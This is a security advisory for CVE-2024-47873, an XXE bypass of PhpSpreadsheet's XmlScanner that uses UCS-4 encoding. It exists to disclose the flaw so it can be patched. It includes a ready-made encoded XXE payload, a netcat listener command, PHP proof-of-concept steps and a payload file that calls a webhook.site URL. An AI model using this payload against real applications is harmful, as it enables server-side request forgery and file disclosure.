CVE-2024-47873
HIGH 7.5 | EPSS 0.17%
XmlScanner bypass leads to XXE
Description
### Summary

The [XmlScanner class](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php) has a [scan](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L72) method that is meant to prevent XXE attacks. However, the regexes used in the `scan` method and the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method can be bypassed by using UCS-4 and encoding guessing as described in <https://www.w3.org/TR/xml/#sec-guessing-no-ext-info>.

### Details

The `scan` method converts the input to UTF-8, if it is not already UTF-8, with the [`toUtf8` method](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L76). It then applies a [regex](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L79) that would also work with a 16-bit encoding. However, the regexes in the [findCharSet](https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php#L51) method, which is used to determine the current encoding, can be bypassed by using an encoding that uses more than 8 bits per character: the regex does not expect null bytes, while the XML library autodetects the encoding as described in <https://www.w3.org/TR/xml/#sec-guessing-no-ext-info>.
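To make the null-byte problem concrete, here is a minimal sketch of how a byte-oriented regex can miss an encoding declaration once the document is re-encoded as UTF-32BE. The pattern is a simplified, hypothetical stand-in and not the exact expression used in `findCharSet`; the variable names are illustrative only.

```php
<?php
// ASCII-only XML declaration, as it might look before re-encoding.
$declaration = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?>';

// Re-encode as UTF-32BE without a BOM. For ASCII input this is simply
// three null bytes in front of every character.
$utf32be = '';
foreach (str_split($declaration) as $char) {
    $utf32be .= "\0\0\0" . $char;
}

// Simplified, hypothetical stand-in for a charset-detection regex.
// It is NOT the exact expression used by findCharSet.
$pattern = '/encoding\s*=\s*(["\'])(.+?)\1/';

$plainHit  = preg_match($pattern, $declaration, $m);
$paddedHit = preg_match($pattern, $utf32be);

echo 'plain input matched:    ', $plainHit, ' (', $m[2] ?? 'n/a', ')', PHP_EOL;
echo 'UTF-32BE input matched: ', $paddedHit, PHP_EOL;
echo 'first four bytes (hex): ', bin2hex(substr($utf32be, 0, 4)), PHP_EOL;
```

In this sketch the literal byte sequence `encoding` never occurs in the padded input, so the pattern finds nothing, while the leading bytes `00 00 00 3C` are exactly what an XML parser can use to guess UCS-4 big-endian on its own.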
A payload for the `workbook.xml` file can, for example, be created with [CyberChef](https://gchq.github.io/CyberChef/#recipe=Encode_text('UTF-32BE%20(12001)')&input=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2IiBzdGFuZGFsb25lPSJ5ZXMiPz4KPCFET0NUWVBFIG1lc3NhZ2UgWwogICAgPCFFTlRJVFkgJSBleHQgU1lTVEVNICJodHRwOi8vMTI3LjAuMC4xOjEyMzQ1L2V4dC5kdGQiPgogICAgJWV4dDsKXT4KPHdvcmtib29rIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5vcGVueG1sZm9ybWF0cy5vcmcvc3ByZWFkc2hlZXRtbC8yMDA2L21haW4iIHhtbG5zOnI9Imh0dHA6Ly9zY2hlbWFzLm9wZW54bWxmb3JtYXRzLm9yZy9vZmZpY2VEb2N1bWVudC8yMDA2L3JlbGF0aW9uc2hpcHMiPjxmaWxlVmVyc2lvbiBhcHBOYW1lPSJDYWxjIi8%2BPHdvcmtib29rUHIgYmFja3VwRmlsZT0iZmFsc2UiIHNob3dPYmplY3RzPSJhbGwiIGRhdGUxOTA0PSJmYWxzZSIvPjx3b3JrYm9va1Byb3RlY3Rpb24vPjxib29rVmlld3M%2BPHdvcmtib29rVmlldyBzaG93SG9yaXpvbnRhbFNjcm9sbD0idHJ1ZSIgc2hvd1ZlcnRpY2FsU2Nyb2xsPSJ0cnVlIiBzaG93U2hlZXRUYWJzPSJ0cnVlIiB4V2luZG93PSIwIiB5V2luZG93PSIwIiB3aW5kb3dXaWR0aD0iMTYzODQiIHdpbmRvd0hlaWdodD0iODE5MiIgdGFiUmF0aW89IjUwMCIgZmlyc3RTaGVldD0iMCIgYWN0aXZlVGFiPSIwIi8%2BPC9ib29rVmlld3M%2BPHNoZWV0cz48c2hlZXQgbmFtZT0iU2hlZXQxIiBzaGVldElkPSIxIiBzdGF0ZT0idmlzaWJsZSIgcjppZD0icklkMiIvPjwvc2hlZXRzPjxjYWxjUHIgaXRlcmF0ZUNvdW50PSIxMDAiIHJlZk1vZGU9IkExIiBpdGVyYXRlPSJmYWxzZSIgaXRlcmF0ZURlbHRhPSIwLjAwMSIvPjxleHRMc3Q%2BPGV4dCB4bWxuczpsb2V4dD0iaHR0cDovL3NjaGVtYXMubGlicmVvZmZpY2Uub3JnLyIgdXJpPSJ7NzYyNkM4NjItMkExMy0xMUU1LUIzNDUtRkVGRjgxOUNEQzlGfSI%2BPGxvZXh0OmV4dENhbGNQciBzdHJpbmdSZWZTeW50YXg9IkNhbGNBMSIvPjwvZXh0PjwvZXh0THN0Pjwvd29ya2Jvb2s%2B.). If you use PhpSpreadsheet to open an Excel file whose `workbook.xml` contains the payload from the link above, you will receive an HTTP request on `127.0.0.1:12345`. You can confirm that the request is made by running the `nc -nlvp 12345` command before opening the file with PhpSpreadsheet.

### PoC

- Create a new folder.
- Run the `composer require phpoffice/phpspreadsheet` command in the new folder.
- Create an `index.php` file in that folder with the following content:

  ```PHP
  <?php
  require 'vendor/autoload.php';

  use PhpOffice\PhpSpreadsheet\Spreadsheet;
  use PhpOffice\PhpSpreadsheet\Writer\Xlsx;

  $spreadsheet = new Spreadsheet();

  $inputFileType = 'Xlsx';
  $inputFileName = './payload.xlsx';

  /** Create a new Reader of the type defined in $inputFileType **/
  $reader = \PhpOffice\PhpSpreadsheet\IOFactory::createReader($inputFileType);
  /** Advise the Reader that we only want to load cell data **/
  $reader->setReadDataOnly(true);

  $worksheetData = $reader->listWorksheetInfo($inputFileName);

  foreach ($worksheetData as $worksheet) {
      $sheetName = $worksheet['worksheetName'];

      echo "<h4>$sheetName</h4>";
      /** Load $inputFileName to a Spreadsheet Object **/
      $reader->setLoadSheetsOnly($sheetName);
      $spreadsheet = $reader->load($inputFileName);

      $worksheet = $spreadsheet->getActiveSheet();
      print_r($worksheet->toArray());
  }
  ```

- Run the following command: `php -S 127.0.0.1:8080`
- Add the [payload.xlsx](https://github.com/user-attachments/files/17334157/payload.xlsx) file to the folder. It contains a payload similar to the one in the Details section, but with the URL `https://webhook.site/65744200-63d2-43a2-a6a0-cca8d6b0d50a` instead of `http://127.0.0.1:12345/ext.dtd`. Then open <http://127.0.0.1:8080> in a browser (the built-in PHP server speaks plain HTTP). You will see an HTTP request on <https://webhook.site/#!/view/65744200-63d2-43a2-a6a0-cca8d6b0d50a>.

### Impact

An attacker can bypass the sanitizer and achieve an [XXE attack](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).
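The encoding autodetection that the Details section relies on can be sketched as follows. This is an illustration of the byte signatures listed in the XML 1.0 specification's encoding-guessing appendix, covering only a subset of them; `guessXmlEncodingFamily` is a hypothetical helper name and is not part of PhpSpreadsheet or of its fix.

```php
<?php
/**
 * Hypothetical helper (not part of PhpSpreadsheet): classify the first
 * bytes of an XML document using a subset of the signatures from the
 * XML 1.0 specification's appendix on encoding autodetection.
 */
function guessXmlEncodingFamily(string $bytes): string
{
    $head = bin2hex(substr($bytes, 0, 4));

    // Signatures with a byte order mark. UCS-4 is checked before UTF-16
    // because FF FE 00 00 also starts with the UTF-16LE mark FF FE.
    if ($head === '0000feff') { return 'UCS-4 big-endian'; }
    if ($head === 'fffe0000') { return 'UCS-4 little-endian'; }
    if (substr($head, 0, 4) === 'feff') { return 'UTF-16 big-endian'; }
    if (substr($head, 0, 4) === 'fffe') { return 'UTF-16 little-endian'; }
    if (substr($head, 0, 6) === 'efbbbf') { return 'UTF-8'; }

    // Signatures without a byte order mark: the first bytes of an
    // XML declaration in each encoding family.
    $withoutBom = [
        '0000003c' => 'UCS-4 big-endian',
        '3c000000' => 'UCS-4 little-endian',
        '003c003f' => 'UTF-16 big-endian',
        '3c003f00' => 'UTF-16 little-endian',
        '3c3f786d' => '8-bit or ASCII-compatible',
    ];

    return $withoutBom[$head] ?? 'unknown (UTF-8 assumed)';
}

// ASCII-only sample; three null bytes per character yields UTF-32BE.
$ascii = '<?xml version="1.0"?><workbook/>';
$utf32be = '';
foreach (str_split($ascii) as $char) {
    $utf32be .= "\0\0\0" . $char;
}

echo guessXmlEncodingFamily($ascii), PHP_EOL;
echo guessXmlEncodingFamily($utf32be), PHP_EOL;
```

A parser that applies this kind of guessing can read a UCS-4 document correctly even when a scanner looking for ASCII text in the raw bytes sees nothing suspicious, which is the mismatch the advisory describes.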
Affected packages (2)
- Packagist/phpoffice/phpexcel: from 0, <= 1.8.2
- Packagist/phpoffice/phpspreadsheet: from 0, < 1.29.4
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | HIGH 7.5 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
References (6)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2024-47873
- PATCH: https://github.com/PHPOffice/PhpSpreadsheet
- WEB: https://github.com/PHPOffice/PhpSpreadsheet/blob/39fc51309181e82593b06e2fa8e45ef8333a0335/src/PhpSpreadsheet/Reader/Security/XmlScanner.php
- WEB: https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-jw4x-v69f-hh5w
- WEB: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- WEB: https://www.w3.org/TR/xml/#sec-guessing-no-ext-info